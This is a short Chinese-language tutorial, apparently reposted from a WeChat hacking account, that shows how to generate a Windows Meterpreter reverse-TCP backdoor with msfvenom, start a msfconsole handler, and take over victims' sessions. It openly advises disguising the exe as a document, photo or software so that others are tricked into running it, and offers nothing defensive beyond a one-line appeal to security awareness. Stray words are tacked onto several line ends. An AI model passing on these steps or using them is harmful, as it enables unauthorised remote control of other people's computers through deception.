須要的工具:msfvenom . msfconsole (kali裏面有)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號 –f exe –o 文件名.exe
即生成一個後門文件xss.exe(我這裏是將文件名命名爲xss的)windows
而後繼續執行命令:安全
msfconsole (運行msfconsole)微信
msf>use exploit/multi/handler (選擇模塊)session
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpxss
set lhost 加ip地址 set lport 加端口號tcp
這樣木馬就配置好了,而後發給別人(能夠僞形成文檔,照片,軟件等文件騙取別人打開)工具
發給別人後,等待別人打開xss.exe,打開即上鉤了spa
msf exploit(handler) > sessions(查看上鉤的用戶).net
msf exploit(handler) > sessions -i 1(選擇須要攻擊的用戶,這裏選擇第 1 個)blog
進入meterpreter了,便可進行一些相關的木馬操做。
請你們,深度理解黑客技術,樹立安全防範攻防意識
本文分享自微信公衆號 - 黑客祕房(hackers0101)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。